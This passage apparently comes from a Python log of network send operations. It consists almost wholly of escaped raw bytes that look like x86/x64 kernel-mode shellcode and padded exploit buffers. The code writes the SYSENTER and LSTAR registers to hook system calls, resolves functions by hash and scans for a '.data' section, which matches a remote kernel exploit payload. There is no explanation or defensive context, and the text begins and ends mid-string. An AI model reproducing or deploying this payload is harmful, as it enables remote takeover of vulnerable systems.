0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 7, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\